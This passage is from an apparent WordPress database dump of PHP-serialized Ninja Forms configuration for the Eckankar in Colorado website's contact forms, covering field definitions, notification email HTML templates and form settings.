end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:47;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:54\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:42:\"Colorado Springs Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3858:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado Springs Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado Springs ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_33}Â {field:lastname_34}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:48;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:42:\"Colorado Springs Leadership Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:38\";s:10:\"form_title\";s:42:\"Colorado Springs Leadership Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:14:18\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"2\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:7:\"html_32\";i:1;s:10:\"textbox_33\";i:2;s:11:\"lastname_34\";i:3;s:8:\"email_35\";i:4;s:8:\"phone_36\";i:5;s:13:\"listselect_37\";i:6;s:5:\"hr_38\";i:7;s:7:\"html_39\";i:8;s:13:\"listselect_40\";i:9;s:11:\"textarea_41\";i:10;s:18:\"html_1663801397261\";i:11;s:9:\"submit_43\";i:12;s:18:\"html_1663801395614\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(13,'a:7:{s:2:\"id\";i:13;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:229:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:245:\"<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below\";s:3:\"key\";s:8:\"html_267\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_267\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:132;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:15:\"one-third first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:133;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:134;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:135;}i:4;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_273\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_273\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:136;}i:5;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:137;}i:6;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_276\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:5:\"value\";s:0:\"\";}s:2:\"id\";i:138;}i:7;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:139;}i:8;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663798083380\";}s:2:\"id\";s:3:\"624\";}i:9;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:141;}}s:7:\"actions\";a:5:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:49;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello 